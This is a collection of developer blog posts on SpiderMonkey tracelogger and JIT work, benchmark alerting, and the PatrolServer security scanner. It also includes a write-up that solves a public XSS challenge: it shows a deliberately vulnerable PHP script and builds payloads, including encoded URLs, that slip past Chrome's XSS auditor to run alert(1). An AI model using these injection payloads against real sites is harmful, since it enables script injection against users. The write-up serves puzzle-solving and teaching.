Performance improvements to tracelogger

Tracelogger is a tool that creates traces of the JS engine, used to investigate or visualize performance issues in SpiderMonkey. Steve Fink has recently been using it to dive into Google Docs performance and has been hitting some roadblocks. The UI became unresponsive, and crashing the browser wasn’t uncommon. That is unacceptable, and it urged me to improve the performance!


I looked at the generated log files, which were not unreasonably large. The log contained 3 million logged items, while I had previously been able to visualize 12 million logged items. So the sheer number of logged items was not the cause. I also knew that creating the fancy graphs was not the problem, since they have already been optimized quite heavily. That left only the overview as a possible culprit.

The overview pane shows which engines / sub parts we spend time in. Beneath it we see the same breakdown, but per script. This is computed in a web worker so that the browser stays responsive. Once in a while the worker hands back a partial result, which the browser renders.

The issue was in the rendering of the partial result. We update this table every time the worker has finished a chunk. Generating the table was fast for the workloads I had been testing, since they didn’t contain many different scripts. Running the full browser, however, produces a lot of different scripts, so updating the table became a big overhead. On top of that, an update could happen as often as every 1ms.

The first fix was to make sure we update this table at most once every 100ms. This is a nice trade-off between seeing the newest information and keeping the browser responsive. It resulted in far fewer calls to update the table: up to 100x fewer.
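The 100ms limit could be sketched roughly as follows. This is a minimal illustration and not the actual tracelogger code: `makeThrottledRenderer`, the `render` callback and the injectable `now` clock are all hypothetical names introduced here.

```javascript
// Hypothetical helper: wraps a render callback so it runs at most once per
// interval. `now` is injectable so the behaviour can be checked without timers.
function makeThrottledRenderer(render, intervalMs = 100, now = Date.now) {
  let lastRender = -Infinity;
  let pending = null; // most recent partial result that has not been rendered

  // Renders the latest pending result, if there is one.
  function flush() {
    if (pending !== null) {
      render(pending);
      pending = null;
      lastRender = now();
    }
  }

  // Called for every partial result the worker posts.
  function update(partialResult) {
    pending = partialResult;
    if (now() - lastRender >= intervalMs) {
      flush();
    }
  }

  return { update, flush };
}
```

A caller would pass every worker message to `update` and call `flush` once when the worker reports that it is done, so the final result is never dropped.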

The next thing I did was to delay the creation of the table. Instead of a table, the UI now shows a textual representation of the data while the computation is running. Only when the computation is complete does it show the sortable table. This was 10x to 100x faster.

Screenshot of tracelogger

In most cases the UI can now generate the temporary view in 1ms. I didn’t want to take any chances, though. If generating the temporary view takes longer than 100ms, the UI stops live updating it and only shows the result when finished.

Lastly I also fixed a memory issue. A tracelogger log is a tree of where time is spent. This tree is parsed breadth-first. That is better, since it gives a fairly good representation quite quickly, even if the small logged items have not all been processed yet. But it means the UI needs to keep track of which items will get processed in the next round, and this list of items could get unwieldy. This is now solved by switching to depth-first traversal when that happens. Depth-first traversal needs no additional state to traverse the tree. In my testcase memory usage previously went to 2GB and the browser crashed. With this change the maximum memory usage I saw was 1.2GB, with no crash.
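A minimal sketch of the idea of capping the breadth-first work list and falling back to depth-first traversal. The node shape (`{ children: [...] }`), the `maxQueue` threshold and the function name are assumptions made for illustration. The sketch uses recursion for the depth-first part, whereas the real log format may allow traversal without even that.

```javascript
// Visits every node of a tree exactly once. Starts breadth-first so coarse
// results arrive early, but handles a child depth-first whenever the queue
// already holds `maxQueue` entries. Returns the peak queue length.
function traverse(root, visit, maxQueue = 1000) {
  const queue = [root];
  let peakQueue = 1;

  // Depth-first fallback: only the call stack grows, bounded by tree depth.
  function depthFirst(node) {
    visit(node);
    for (const child of node.children) depthFirst(child);
  }

  while (queue.length > 0) {
    const node = queue.shift();
    visit(node);
    for (const child of node.children) {
      if (queue.length < maxQueue) {
        queue.push(child); // still room: keep going breadth-first
      } else {
        depthFirst(child); // queue is full: finish this subtree right away
      }
    }
    peakQueue = Math.max(peakQueue, queue.length);
  }
  return peakQueue;
}
```

The trade-off is that subtrees handled by the fallback are processed completely before the remaining coarse items, so the early overview is slightly less even, in exchange for a bounded work list.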

Everything has landed in the GitHub repo. Everybody using the tracelogger is advised to pull the newest version and experience the improved performance. As always, feel free to report new issues or to contribute to making tracelogger even better.


Tracelogger gui updates

Tracelogger is one of the tools JIT devs (especially me) use to look into performance issues and to improve the JS engine of Firefox performance-wise. It traces which functions are executing, together with extra information such as which engine is running, how long compilation took, how many times we are GC’ing and whether we are calling VM functions …

I made the GUI a bit more powerful. First of all I moved the computation of the overview to a web worker. This should help the usability of the tool. Next to that I made it possible to toggle the categories on and off, which might make the graphs easier to understand. I also introduced a settings popup, in which you can now choose to see absolute (CPU ticks) or relative (%) timings.

Screenshot from 2016-05-03 09:36:41

There are still a lot of improvements that are possible. Eventually it should be possible to zoom on graphs, toggle scripts on/off, see full times of scripts (instead of self time only) and maybe make it possible to show another graph (like a flame chart). Hopefully one day.

This is of course open source and available at:

Perfherder and regression alerts

In the dawn of arewefastyet only two machines were running and only three benchmarks were important. At that time it was quite easy to just go over the different benchmarks once in a while and spot the regressions. Things have come a long way since. Due to the enormous increase in the number of benchmarks and machines I created a regression detector, which wasn’t as easy as it sounds. False positives and false negatives are the enemy of such a system. Bimodal benchmarks, noise, compiler perturbations, the number of data points … none of it helped. This also had low priority, given that I’m supposed to work on improving JIT performance and not on recording JIT performance.

Then Perfherder came along, which aims to collect any performance data in a central place and to act on that information, and which has some dedicated people working on it. Since the beginning of 2016 AWFY has started to use that system more and more. We have been sending the performance data to Perfherder for a few months now, and Perfherder has been improving to support more and more of the functionality AWFY needs. Switching the regression detection from AWFY to Perfherder is coming closer, which will remove my largest time drain and allow me to focus even more on the JIT compiler!

The alerts Perfherder creates are visible at:

Since last week we can request alerts on the subscores of a benchmark, which is quite important for JS benchmarks. Octane has a variance of about 2%, and a subscore that regresses by 10% will only decrease the full benchmark score by about 1%. As a result such a regression is within the noise level and won’t get detected. This week this feature was enabled on AWFY, which will increase the correctness and completeness of the alerts Perfherder creates.
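The arithmetic behind that claim can be checked with a small sketch. It assumes the total score is the geometric mean of equally weighted subscores, and the number of subscores is a free parameter. Both are assumptions of this example, not something taken from AWFY or Perfherder.

```javascript
// Geometric mean of a list of positive scores.
function geometricMean(scores) {
  const logSum = scores.reduce((sum, score) => sum + Math.log(score), 0);
  return Math.exp(logSum / scores.length);
}

// Relative drop of the total when one of `count` equally weighted subscores
// regresses by `regression` (0.10 means 10%).
function totalDrop(count, regression) {
  const before = new Array(count).fill(1000);
  const after = before.slice();
  after[0] *= 1 - regression;
  return 1 - geometricMean(after) / geometricMean(before);
}
```

Under these assumptions, `totalDrop(10, 0.10)` comes out at roughly 1%, which stays inside a 2% noise band even though the subscore itself moved by 10%.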

I want to thank Joel Maher and William Lachance for their help with this.


AWFY now comparing across OS

At the end of last year (2015) we had performance numbers of Firefox compared to the other browser vendors in the shell, and in the browser on Windows 8 and Mac OS X, on different hardware.

This led to requests for better information. We had no way to tell whether Firefox on Windows was slower than on other OSes on the same hardware. We also got requests to run Windows 10 and to compare against the Edge browser.

Due to these requests we decided to find a way to run all OSes on hardware with the same specification. To do that we ordered three Mac minis and installed the latest flavors of Windows, Mac OS X and Ubuntu on them. Afterwards we got our AWFY slave running on each machine and started reporting to the same graph.

Compare OS

Finally we have Edge performance numbers. Their new engine isn’t sub-par compared to other JS engines. It is quite good! There are some side notes I need to attach to the numbers above, though. We cannot state often enough that Sunspider is actually obsolete. It was a good benchmark at the start of the JS performance race. Now it is mostly annoying, since it tests the wrong things, not the things you want to or should improve. Next to that, Octane is still a great benchmark, except for mandreel latency. That benchmark is totally wrong and we notified the V8 team about it, but we have had no response so far. It is quite sad to see our hard work devalued due to other vendors gaming that benchmark.

We also have performance numbers across OSes for the first time. This showed us our Octane score was lower on Windows. Over the last few months we have been rectifying this. We still see somewhat slower cold performance due to MSVC 2015 being less eager in inlining functions. But our JIT performance should now be similar across platforms!



PatrolServer 1.0.1

We at PatrolServer aim to increase security by decreasing vulnerability of public servers on the internet. Last week our product PatrolServer was released to the public in an open beta. This tool continuously monitors outdated software and exploits on your server and informs you.

During the last week, a lot of people have tried this tool and provided us with vital feedback. We carefully listened to the complaints, suggestions and compliments and tried to react to all of them. The feedback is greatly appreciated and we will continue to listen to any information from our early adopters.

In this small timeframe we were able to address some of the comments raised and will implement other suggestions in upcoming releases. Keep your feedback flowing!

New Features:

We upgraded the way to submit feedback from within PatrolServer itself by integrating Zendesk. A nice side effect is that while we are online, we can chat with the original submitter to request more information or to help immediately. Search for help or chat inside the tool.

For the open beta we focused on Linux servers, since that is our domain and since most servers run Linux. During the release we got feedback asking us to also support ASP.NET. Therefore we added preliminary support for ASP.NET. The extensiveness of this detection will improve in the future, and IIS is also on the roadmap. Stay tuned while we add Microsoft support.

Some people seem to forget to add any servers or to verify their servers. As a result they didn’t get any reports or updates about the vulnerability of their server. To combat this we now send a reminder to everybody who signed up but didn’t add any servers or forgot to verify their server.

The tool has been adjusted to work on mobile phones. Here we must thank the people who reported the issues they had on their phones. The tool should be fully responsive now!

We also added some extra security measures, such as a country lock. That should make your account even safer.

Full changelog:
- Fix PHP error for older PHP versions with the PHP detector
- Initial support for ASP.NET
- Disable sending mails of outdated software to unverified servers.
- Add a priority to scanning of servers
- Fix overlapping content on mobile
- Add hostmaster as potential verification mailer
- Implement Zendesk support in app
- More aggressively detect php
- Add mailer for empty accounts or not verified servers
- Force ssl on login
- Add second cpe name for nginx
- Add outdated debian versions lenny, etch, sarge
- Ubuntu support for lucid ended and for vivid started
- Keep the cron working without overlap
- Add statistics page
- Stress test: add 25.000 scans simultaneously
- Added more information about our company in the footer
- Added support for versions:
 * mysql: 5.5.43-0ubuntu0.14.10.2, 5.5.43-0ubuntu0.14.04.2,
          5.6.19-1~exp1ubuntu2.1, 5.6.19-0ubuntu0.14.04.2,
          5.5.44-0ubuntu0.14.10.1, 5.5.44-0ubuntu0.14.04.1,
          5.5.44-0ubuntu0.12.04.1, 5.6.19-0ubuntu0.14.04.3,
 * openssl: 1.0.1p, 1.0.2d
 * php: 5.6.11, 5.5.27, 5.4.43, 5.5.12+dfsg-2ubuntu4.6,
        5.5.9+dfsg-1ubuntu4.11, 5.3.10-1ubuntu3.19
 * apache: 2.4.16, 2.2.31
 * nginx: 1.9.3, 1.6.2-5ubuntu3.1

We hope to address your issue soonish,
The PatrolServer team

In the land of XSS ‘possibly safe’ means ‘exploitable’

XSS (or cross-site scripting) is an attack found in web applications, where malicious people try to inject data into websites in order to steal sensitive data. Despite efforts to decrease the opportunities it still is one of the most used attacks.

Detectify posted an XSS challenge related to a real case they found. The challenge, called “twins of ten”, checks every input and only allows 10 characters per input. To make the challenge even more fun they also required that the solution works with the Chrome XSS auditor enabled. This tool is used in Chrome to combat XSS exploits on the user’s side.

In the challenge one needs to break the following PHP script (which emulates the issue they found):

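$q = urldecode($_SERVER['QUERY_STRING']);
$qs = explode('&', $q);
$qa = array();
$chars = 0;
foreach($qs as $q) {
	$q = explode('=', $q);
	// drop the parameter name; assumed missing from this listing, since the
	// 10 character limit described in the text only applies to the value
	array_shift($q);
	$s = implode('=', $q);
	// skip any value longer than 10 characters
	if(strlen($s) > 10) continue;
	$chars += strlen($s);
	$qa[] = $s;
}
// every accepted value is echoed, unescaped, into an opening and a closing tag
foreach($qa as $q) {
	echo "<0123$q><b x=\"x\">foo</b></0123$q>";
}
echo '<!-- '.$chars.' chars long -->';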

In this script the input is checked, but not well enough. The authors thought it would be safe to only make sure each input is at most 10 characters long. Ten characters is awfully little. The reasoning behind this limit is probably that it makes an attack almost impossible. But if we know one thing about hackers, it is that they are persistent, and a small potential crack is enough to get them interested in finding a way to break in. That also applies to this script, and we are going to prove it!

How can we exploit this?

When we go to the web page we can adjust some of the parameters with arbitrary data. The only constraint is that every value can only be 10 characters long:


This request will generate the following html code. It is visible that the values are injected into the html code without any alteration or checking of values:

<0123{1}><b x="x">foo</b></0123{1}><0123{2}><b x="x">foo</b></0123{2}><0123{3}><b x="x">foo</b></0123{3}><0123{4}><b x="x">foo</b></0123{4}>

Our goal is to adjust {1} to {n} and eventually show we can run arbitrary javascript code. For this example we will try to alert something:


Now before going further I would encourage everybody to think about this issue and try it out. It is a fun brain teaser, especially the part to fool the chrome XSS detector. The rest of the post is about a solution I found.

The first thing one needs to do is find a place within a script-tag where we can inject some javascript code. In this example there is no script-tag present, so we have to inject a script-tag ourselves. Let’s try this by splitting the tags over different inputs. If we do {1} => “><script>” and {2} => “></script>” we will get:

<0123><script>><b x="x">foo</b></0123><script>><0123></script>><b x="x">foo</b></0123></script>>

This brings us closer. We injected a script open and close tag. That is already good. Only the code inside the tags is nonsense. We need to come up with a way to neutralize it. Due to the limit we don’t have a lot of wiggle room. Most languages have some way to comment out code, e.g. /*, //, <!--. So let’s have a look at whether we can use that here:

{1} => "><script>/*"
{2} => "*/</script>"
<0123><script>/*><b x="x">foo</b></0123><script>/*><0123*/</script>><b x="x">foo</b></0123*/</script>>

This seems to work. We successfully made the code valid by turning the html tags in between into comments. We still need to address two things, though.

1) The first item ({1}) is actually 11 characters. This will fail, since only 10 characters are allowed. Luckily for us we can abuse the system a bit, since we can remove the first ‘>’. Almost all browsers will assume the first <0123 actually wasn’t a tag and the user forgot to use &lt;

{1} => "<script>/*"
{2} => "*/</script>"
<0123<script>/*><b x="x">foo</b></0123<script>/*><0123*/</script>><b x="x">foo</b></0123*/</script>>

Which fixes the first issue.

2) Chrome has an XSS auditor in the browser that uses heuristics to try to detect injected javascript code and stop the attack. This measure protects users: even if a website is vulnerable, the user is still protected. This example triggers the auditor, and as a result the code in between the tags won’t get executed.

The same happens when trying:

{1} => "<script>//"
{2} => "\n</script>"
<0123<script>//><b x="x">foo</b></0123<script>//><0123
</script>><b x="x">foo</b></0123

So the hard part about the challenge here was to fool the chrome auditor. There are a lot of examples on how to fool the auditor, but most are already outdated. Chrome improves their auditor, making it harder every time. Though since this is based on heuristics we might find a way to fool the browser.

As a result I searched a bit to get more information about the auditor:

The last link even has some examples that still work with the newest Chrome release, but I couldn’t use them in my example. I did learn some tricks to fool the auditor, though. It seems that the content inside the script-tag is compared with the provided input, and when a match is found the script is blocked. Also, it sometimes doesn’t look at anything behind the “//”. And one needs to make sure that most of the code is actually original code, not related to the parameters.

I had to try a lot of possible inputs that didn’t fool the auditor, almost gave up a couple of times, tried again, saw the auditor call my bluff again and iterated once more, before I finally found a snippet that worked.

In order to achieve an attack, I had to fool the auditor that the existing code wasn’t removed, but was still part of the javascript code. That was the reason comments didn’t work. I found that creating unused strings out of them was a strategy the auditor didn’t detect (yet?):

{1} => "<script>//"
{2} => "'\n;'+"
{3} => "'</script"
<0123<script>//><b x="x">foo</b></0123<script>//><0123'
;'+><b x="x">foo</b></0123'
;'+><0123'</script><b x="x">foo</b></0123'</script>

So anything we put in {2} after the newline is javascript code that will run. We don’t have much space, since we only have 10 characters and we already use 5 characters to ‘remove’ the extra html code. That leaves 5 characters to do something. Another issue we need to work around is that every 5 characters we write get executed twice, so we cannot do anything that would go wrong when executed twice. But within those constraints we can repeat {2} multiple times to finally start executing the code we want.

{2} => "'\nXXXXX;'+"

There are probably multiple ways to do this. I went with the idea of creating the string “alert”, which is doable with statements of only 5 characters:

a='a' // 5 chars
l='l' // 5 chars
e='e' // 5 chars
r='r' // 5 chars
t='t' // 5 chars
b=a+l // 5 chars
c=b+e // 5 chars
d=c+r // 5 chars
e=d+t // 5 chars; e now contains "alert"

Now the trouble starts with invoking the string. It is possible to do this[e], which returns the alert function given the string “alert”. That seems good, but we need 6 characters for this:

t=this // 6 chars;
s=t[e] // 6 chars; s now contains the function alert

s(1) // 4 chars; alert(1)!!! 
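The lookup trick can be tried outside a browser with a stand-in object. In the sketch below `fakeWindow` is a hypothetical replacement for the page's global object, so that the example runs anywhere. In a real page the lookup would be `this[e]` at the top level of the script.

```javascript
// Stand-in for the browser's global object, which has `alert` as a property.
const fakeWindow = {
  calls: [],
  alert(message) { this.calls.push(message); },
};

// Build the name piece by piece, as in the short statements above.
let a = 'a', l = 'l', e = 'e', r = 'r', t = 't';
let b = a + l;
let c = b + e;
let d = c + r;
e = d + t; // e is now the string "alert"

// Property access with a computed string returns the function itself.
const s = fakeWindow[e];
s.call(fakeWindow, 1); // in the page a plain s(1) does the same job
```

Running every assignment twice, as happens in the challenge, would not change the outcome, since each statement only overwrites a variable with the same value.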

Here I went and thought back about the issue why we didn’t use comments instead of strings to hide the existing html tags. We wanted to fool the auditor. Now it seems that after our first little hack, the third input doesn’t need this special format. We fooled the auditor and our third parameter had a little bit of more freedom. As a result I could transform the input to:

{3} => "'\nXXXXXX//"
{1} => "<script>//"
{2} => "'\nfoo1;'+"
{3} => "'\nfoo2//"
{4} => "'</script"
<0123<script>//><b x="x">foo</b></0123<script>//><0123'
foo1;'+><b x="x">foo</b></0123'
foo2//><b x="x">foo</b></0123'
foo2//><0123'</script><b x="x">foo</b></0123'</script>

Which meant we now have 6 characters at our disposal, just the amount we needed. There is only one hurdle left. If we run the code with the small chunks listed above we will alert twice. That is not the intention. We want to alert only once, so we need to remove the first or second occurrence.

I did this by promoting the first occurrence into the string I used to ‘remove’ the original code.

{1} => "<script>//"
{2} => "'\n;'+"
{3} => "\\\nfoo2;'//"
{4} => "'</script"
<0123<script>//><b x="x">foo</b></0123<script>//><0123'
;'+><b x="x">foo</b></0123'
foo2;'//><b x="x">foo</b></0123\
foo2;'//><0123'</script><b x="x">foo</b></0123'</script>

Putting this all together we get the following inputs:

{1}  => "<script>//"
{2}  => "'\na='a';'+"
{3}  => "'\nl='l';'+"
{4}  => "'\ne='e';'+"
{5}  => "'\nr='r';'+"
{6}  => "'\nt='t';'+"
{7}  => "'\nb=a+l;'+"
{8}  => "'\nc=b+e;'+"
{9}  => "'\nd=c+r;'+"
{10} => "'\ne=d+t;'+"
{11} => "'\nt=this//"
{12} => "'\nk=t[e]//"
{13} => "\\\nk(1);'//"
{14} => "'</script"

The php script at the beginning of this post can now get compromised just by running: example.php?a=<script>%2F%2F&a=%27%0Aa%3D%27a%27%3B%27%2B&a=%27%0Al%3D%27l%27%3B%27%2B&a=%27%0Ae%3D%27e%27%3B%27%2B&a=%27%0Ar%3D%27r%27%3B%27%2B&a=%27%0At%3D%27t%27%3B%27%2B&a=%27%0Ab%3Da%2Bl%3B%27%2B&a=%27%0Ac%3Db%2Be%3B%27%2B&a=%27%0Ad%3Dc%2Br%3B%27%2B&a=%27%0Ae%3Dd%2Bt%3B%27%2B&a=%27%0At%3Dthis%2F%2F&a=%27%0Ak%3Dt%5Be%5D%2F%2F&a=%5C%0Ak%281%29%3B%27%2F%2F&a=%27<%2Fscript
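To double check that every input respects the limit, and to rebuild such a url from the list, a small script helps. This is only a convenience sketch: the parameter name `a` and the file name `example.php` are taken from the url above, everything else is illustrative.

```javascript
// The 14 inputs from the list above, written as JavaScript string literals.
const inputs = [
  "<script>//",
  "'\na='a';'+",
  "'\nl='l';'+",
  "'\ne='e';'+",
  "'\nr='r';'+",
  "'\nt='t';'+",
  "'\nb=a+l;'+",
  "'\nc=b+e;'+",
  "'\nd=c+r;'+",
  "'\ne=d+t;'+",
  "'\nt=this//",
  "'\nk=t[e]//",
  "\\\nk(1);'//",
  "'</script",
];

// Values that would be skipped by the script's strlen($s) > 10 check.
const tooLong = inputs.filter((value) => value.length > 10);

// encodeURIComponent leaves ' ( ) unescaped, which is still a valid query
// string; the important part is that "+" and the newline get escaped.
const url = "example.php?" +
  inputs.map((value) => "a=" + encodeURIComponent(value)).join("&");
```

If `tooLong` is empty, every value passes the length check of the script.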

Edit: this isn’t the smallest possible attack. With some tricks it is possible to write up to 7 characters in one go. As a result it is not necessary to create a string for “alert” and execute it through “this”. But it shows some of the thinking and tricks that can be used to create an attack. The smallest set I found was:

{1}  => "<script>//"
{2}  => "'\n'+"
{3}  => "'\n//"
{4}  => "\ne=alert//"
{5}  => "\\\ne(1);'//"
{6}  => "'</script"

Which yields the following url: example.php?a=%3Cscript%3E%2F%2F&a=%27%0A%27%2B&a=%27%0A%2F%2F&a=%0Ae%3Dalert%2F%2F&a=%5C%0Ae%281%29%3B%27%2F%2F&a=%27%3C%2Fscript

Feel free to take the challenge to better my personal record and contact me on twitter using @patrolserver and I will update this post with your record and name and maybe even buy you a beer ;).

Aftermath of Logjam

Last week the Logjam attack was disclosed: an attack on the Diffie-Hellman key exchange as used in TLS, which affects many protocols including HTTPS, SSH, IPsec, SMTPS … The attack relies on the fact that it is possible to negotiate inferior keys for the Diffie-Hellman key exchange. A nice explanation has been put together by Cloudflare.

We are currently creating PatrolServer, a webapp that will check servers for potential outdated software and possible exploits. This TLS attack was a nice welcome for us to test our capabilities and what we can expect from such a webapp. We created a small scanner where people could provide and test their website/server.

Since it was our first time, it took quite a while before our scanner was ready. We weren’t prepared and still had to build a small infrastructure for this one-off test and add a reasonably decent layout. Half a day after the disclosure we were live and could redirect people to our tool, hoping they would fix their server.

“To measure is to know” - Sir William Thomson

Our first objective, getting people to test their server, went smoothly. Over three days we were just short of testing 2000 unique servers. In most cases people tested their own server, but some were naughty enough to test corporate servers like google, gmail, banks, yahoo, reddit … We even had somebody from Toledo (Spain) abusing the system to generate a list of all vulnerable sites. Upon detection he was of course banned. Some ideas came to mind, like always returning either vulnerable or not vulnerable, or even returning random results, but we decided to just hide the results. Maybe we can do something like that next time. We also got a request on twitter to enable SNI hosts, which we didn’t support at the time. We want to thank everybody who used the tool and sent suggestions. Always appreciated.

“Those who have the privilege to know have the duty to act.” — Albert Einstein

The second objective, the paramount goal of our little startup, is to get people to fix their servers. The Open Web Application Security Project (OWASP) ranks server misconfiguration and not updating servers fifth in their top 10 web application security list. With our tool we saw that a lot of servers were outdated: 30% of our tests returned an affected state.

A week later we reran the list to see how things had progressed and saw only one server that had actually fixed the problem. That is quite low. People know their server has a problem, but they don’t act on it. We assume that is something we will also see in the full webapp. The biggest goal of PatrolServer, after reporting issues with a server, will be to engage people to fix the issues. How to do that is a bigger question, and we are still trying to figure that part out. We already have a lot of ideas, but also need to find the right balance between annoying people and being helpful about vulnerabilities. If you have a suggestion, please let us know!

Closing remarks: PatrolServer is being actively developed. The platform to detect outdated software is in place. We already have support for some software, but we still want to extend the list. The frontend has gotten some layout love, which isn’t quite finished yet. In the near future we will probably start a closed or open beta in order to get some early feedback. Anybody wanting to get notified about this milestone and/or anybody wanting to test drive the platform on their server can enter their email address here:

Year in review: Spidermonkey in 2014 part 3

In the first two parts I listed the major changes in the JavaScript engine of Mozilla Firefox in 2014 and enumerated the major changes that happened from Firefox 29 until Firefox 34. In part 3 I will go over the major changes in the JavaScript engine in the last two releases that were developed in 2014.

If you haven’t read the first parts yet, I would encourage you to do that first.
<- Year in review: Spidermonkey in 2014 part 1
<- Year in review: Spidermonkey in 2014 part 2

Firefox 35

JIT RegExp.prototype.exec and RegExp.prototype.test

When Firefox 32 was released, the regular expression engine was replaced with Irregexp. The new engine has, just like its predecessor, a small JIT where regular expressions get compiled to native code. And just like with its predecessor, the easiest way to embed the regular expression engine is to use C code. Consequently a normal execution of a regular expression looked as follows: the JS code goes into C code that prepares the regular expression engine JIT, after which the regular expression engine gets called. In this release we eliminated the middle step (the C code) and now jump directly from the JS JIT to the regular expression JIT, removing the overhead the C code introduced when calling RegExp.prototype.exec or RegExp.prototype.test.

Read more about this in the bug report

GVN + UCE combined

Just like most compilers, IonMonkey has an optimization called Global Value Numbering (GVN). It tries to remove or replace redundant instructions. In our implementation it is also the place where most replacements based on inputs happen, like constant folding, identity removal … After this pass we run Unreachable Code Elimination (UCE), which eliminates branches that are never taken. Optimizations taking place during GVN can improve the efficiency of UCE: more folded instructions can increase how much code is found to be dead. On the other hand, removed code can in turn make it possible for GVN to optimize some extra instructions. Before Firefox 35 we ran each pass only once. As a result we sometimes didn’t find the most optimal code. With this release GVN and UCE are combined, making it possible to get the same optimizations as running GVN and UCE multiple times after each other, but in only one pass.
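The interplay between folding and branch removal can be shown on a toy example. The sketch below is not IonMonkey's algorithm. The tiny IR (assignments and if statements as plain objects), `fold` and `optimize` are all made up for illustration, and constant folding stands in for the much richer GVN pass.

```javascript
// Toy IR: an expression is a number, a variable name (string), or
// { op: '+' | '<', left, right }. A statement is { assign, value } or
// { if: condition, then: [...], else: [...] }.

// Folds an expression using the constants known so far.
function fold(expr, env) {
  if (typeof expr === 'number') return expr;
  if (typeof expr === 'string') return env.has(expr) ? env.get(expr) : expr;
  const left = fold(expr.left, env);
  const right = fold(expr.right, env);
  if (typeof left === 'number' && typeof right === 'number') {
    return expr.op === '+' ? left + right : Number(left < right);
  }
  return { op: expr.op, left, right };
}

// One combined walk: fold every statement and drop a branch as soon as its
// condition folds to a constant. Constants from the surviving branch feed
// the folding of later statements.
function optimize(stmts, env = new Map()) {
  const out = [];
  for (const stmt of stmts) {
    if ('assign' in stmt) {
      const value = fold(stmt.value, env);
      if (typeof value === 'number') env.set(stmt.assign, value);
      else env.delete(stmt.assign);
      out.push({ assign: stmt.assign, value });
      continue;
    }
    const cond = fold(stmt.if, env);
    if (typeof cond === 'number') {
      out.push(...optimize(cond ? stmt.then : stmt.else, env));
      continue;
    }
    // Unknown condition: keep both arms and only trust constants that
    // have the same value on both paths.
    const thenEnv = new Map(env);
    const elseEnv = new Map(env);
    const thenArm = optimize(stmt.then, thenEnv);
    const elseArm = optimize(stmt.else, elseEnv);
    env.clear();
    for (const [name, value] of thenEnv) {
      if (elseEnv.get(name) === value) env.set(name, value);
    }
    out.push({ if: cond, then: thenArm, else: elseArm });
  }
  return out;
}

const program = [
  { assign: 'x', value: { op: '+', left: 1, right: 2 } },
  { if: { op: '<', left: 'x', right: 2 },
    then: [{ assign: 'y', value: 10 }],
    else: [{ assign: 'y', value: 20 }] },
  { if: { op: '<', left: 'y', right: 15 },
    then: [{ assign: 'z', value: 'input' }],
    else: [{ assign: 'z', value: 0 }] },
];
const optimized = optimize(program);
```

Here the second branch can only be removed because the first branch was removed before it, which made `y` a known constant. Folding once and then eliminating branches once, as two separate passes, would leave the second `if` in place.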

Learn more about this in an explanatory video

Lazy linking when recompiling code

The compilation of Ion code happens in three phases. First we have the graph creation phase (which happens in IonBuilder), afterwards we do all sorts of optimizations on that graph, and we end with a linking phase, which finishes the compilation. Of these, only the optimizing part can be done off the main thread. The other two phases block execution of JavaScript code. Lazy linking is about improving the last phase. Until now linking happened eagerly: as soon as a graph was ready we would try to link it, even if we would never execute that code (again) or if it got invalidated due to better types. With lazy linking we wait until we want to execute that code before linking.
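The difference between eager and lazy linking can be modelled in a few lines. This is a conceptual sketch only: `CompiledScript`, its fields and the `link` callback are hypothetical and do not correspond to actual SpiderMonkey classes.

```javascript
// Hypothetical model of a finished compilation. `link` stands in for the
// expensive main-thread linking phase.
class CompiledScript {
  constructor(graph, link) {
    this.graph = graph;       // optimized graph, ready to be linked
    this.link = link;         // turns a graph into runnable code
    this.code = null;         // linked code, created on first use
    this.invalidated = false;
  }

  // Called when better type information makes the graph useless.
  invalidate() {
    this.invalidated = true;
    this.graph = null;
  }

  // Linking is deferred until the code is actually needed.
  run(...args) {
    if (this.invalidated) throw new Error('script was invalidated before use');
    if (this.code === null) {
      this.code = this.link(this.graph);
    }
    return this.code(...args);
  }
}
```

A script that gets invalidated, or is simply never called again, never pays for the `link` step in this model.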

Read more about this in the bug report.

Compile non-CNG functions

Compile and Go (CNG) functions give extra performance since the caller cannot modify objects on the scope chain between compilation and execution [1]. With this guarantee compilers can better optimize access to these objects. Until now IonMonkey could only compile such functions. Non-CNG functions were stuck in the baseline compiler. In Firefox 34 and 35 these limitations were mostly removed. Given that our most important class of non-CNG functions is in addons and chrome content, this will give a nice boost to their performance.

Read more about this in the bug reports: bug 1064777, bug 1045529 and bug 911570

Firefox 36

Baseline compile generators

As mentioned in part 1, Firefox 30 saw the introduction of ES6 generators. In that release only support for the interpreter (our first tier) was added. This was because the initial implementation tried to support this feature while touching as little code as possible. But this method also disabled support for higher tiers. Six releases later we are proud to also have support for generators in our second tier, the baseline compiler, and that even before ES6 is released.

Wingo did the beginning of this huge task and has written a blogpost about it.
Read the blogpost about support of compiling generators in Baseline

ES6 Symbols

For the first time in a very long time a new primitive type was added to the engine. This has everything to do with the upcoming ES6 spec, which introduces Symbols. Next to null, undefined, boolean, number and string, symbol is now present on that list. A Symbol is a unique and immutable primitive value. Without going too deep, it can enable hiding of properties or fix name clashes between properties. It can also help to avoid breaking existing codebases when new property names are introduced to the language. It is not something people immediately need to use, but it can open new and maybe better ways to do some things.
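A short example of the properties mentioned above (the object and the names are of course just for illustration):

```javascript
const id = Symbol('id');
const otherId = Symbol('id');

const user = { name: 'Ada' };
user[id] = 42;

// Two symbols are never equal, even with the same description.
const distinct = id !== otherId;

// Symbol-keyed properties are skipped by Object.keys and JSON.stringify,
// which is what makes them useful for "hidden" properties.
const keys = Object.keys(user);
const json = JSON.stringify(user);

// A string key with the same name does not clash with the symbol key.
user.id = 'string-keyed';
```

After this runs, `user[id]` is still 42 while `user.id` holds the string, so code that adds its own symbol-keyed property cannot collide with property names an existing codebase already uses.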

Read more about this in the developer reference
Stackoverflow: why bring symbols to JS

Selfhosting String.prototype.substr, String.prototype.substring and String.prototype.slice

In Firefox 20 the selfhosting infrastructure landed. Since that release we can implement JavaScript features in JavaScript itself, instead of writing them in C. At runtime such a selfhosted function just gets executed as if somebody had written it in JavaScript. The major improvement here is that we remove the overhead of calling from JavaScript out to C and back. This gave improvements for e.g. “ { /* … */})” since the C step was fully eliminated between calling the function and the function given in the argument. In this release substr, substring and slice are now also selfhosted. For these functions the speedup mostly comes from the fact that the edge case checks (start is positive and length is smaller than string length) are now done in JavaScript, so IonMonkey can reason about them and potentially remove those checks!
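To give an idea of what such edge case checks look like when written in JavaScript, here is an illustrative substring. It is not the actual selfhosted SpiderMonkey code: `clampIndex` and `substringSketch` are names made up here, and the character loop is a stand-in for whatever the engine does to produce the final string.

```javascript
// Converts an argument to an integer index clamped to [0, length].
function clampIndex(value, length) {
  const n = Math.trunc(Number(value)) || 0; // NaN becomes 0
  return Math.min(Math.max(n, 0), length);
}

// Behaves like String.prototype.substring for string inputs.
function substringSketch(str, start, end) {
  const length = str.length;
  const a = clampIndex(start, length);
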